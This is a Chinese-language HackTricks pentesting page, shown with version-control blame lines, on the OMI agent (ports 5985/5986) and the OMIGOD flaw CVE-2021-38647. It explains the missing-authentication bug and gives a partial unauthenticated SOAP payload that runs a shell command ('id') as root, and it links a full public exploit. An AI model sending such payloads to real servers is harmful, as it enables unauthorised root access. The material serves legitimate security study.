2023-08-03 19:12:22 +00:00
|
|
|
|
# 5985,5986 - OMI渗透测试
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* 你在一家**网络安全公司**工作吗?想要在HackTricks中看到你的**公司广告**吗?或者你想要访问**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
|
|
|
|
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
* **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## 基本信息
|
2022-02-02 14:36:35 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
OMI是由Microsoft开发的开源远程配置管理工具。当使用以下服务时,通常会在Azure Linux服务器上安装OMI代理:
|
2022-02-02 14:36:35 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* Azure自动化
|
|
|
|
|
* Azure自动更新
|
|
|
|
|
* Azure运营管理套件
|
|
|
|
|
* Azure日志分析
|
|
|
|
|
* Azure配置管理
|
|
|
|
|
* Azure诊断
|
2022-02-02 14:36:35 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
当配置了这些服务时,omiengine进程将在所有接口上监听,并以root用户身份运行。
|
2022-02-02 14:36:35 +00:00
|
|
|
|
|
2022-11-07 10:43:41 +00:00
|
|
|
|
<figure><img src="../.gitbook/assets/image (1) (3) (2).png" alt=""><figcaption></figcaption></figure>
|
2022-02-02 14:36:35 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
**默认端口:**5985(http),5986(https)
|
2022-02-02 14:36:35 +00:00
|
|
|
|
|
2022-09-09 16:14:55 +00:00
|
|
|
|
## [CVE-2021-38647](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)
|
2022-02-02 14:36:35 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
截至9月16日,Azure中新创建的Linux服务器仍然使用一个存在漏洞的OMI代理版本。在部署Linux服务器并启用上述服务之后,服务器将处于易受攻击的状态。
|
2022-02-02 14:36:35 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
OMI服务器通过/wsman端点接收配置管理消息。通常,会传递一个身份验证头和消息,OMI服务器将确保客户端被授权进行通信。在这种情况下,漏洞是当没有身份验证头时,服务器错误地接受消息并以root用户身份执行指令。
|
2022-02-02 14:36:35 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
通过向服务器发送一个没有指定身份验证头的“ExecuteShellCommand”SOAP负载,它将以root身份执行该命令。
|
2022-02-02 14:36:35 +00:00
|
|
|
|
```xml
|
|
|
|
|
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
|
2023-08-03 19:12:22 +00:00
|
|
|
|
...
|
|
|
|
|
<s:Body>
|
|
|
|
|
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
|
|
|
|
|
<p:command>id</p:command>
|
|
|
|
|
<p:timeout>0</p:timeout>
|
|
|
|
|
</p:ExecuteShellCommand_INPUT>
|
|
|
|
|
</s:Body>
|
2022-02-02 14:36:35 +00:00
|
|
|
|
</s:Envelope>
|
|
|
|
|
```
|
2023-08-03 19:12:22 +00:00
|
|
|
|
在[https://github.com/horizon3ai/CVE-2021-38647](https://github.com/horizon3ai/CVE-2021-38647)中找到完整的漏洞利用。
|
2022-02-02 14:36:35 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## 参考资料
|
2022-02-02 14:36:35 +00:00
|
|
|
|
|
|
|
|
|
* [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/)
|
|
|
|
|
* [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* 你在一家**网络安全公司**工作吗?想要在 HackTricks 中**宣传你的公司**吗?或者想要**获取最新版本的 PEASS 或下载 PDF 格式的 HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
|
|
|
|
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
* **通过向[hacktricks 仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud 仓库](https://github.com/carlospolop/hacktricks-cloud)提交 PR 来分享你的黑客技巧**。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|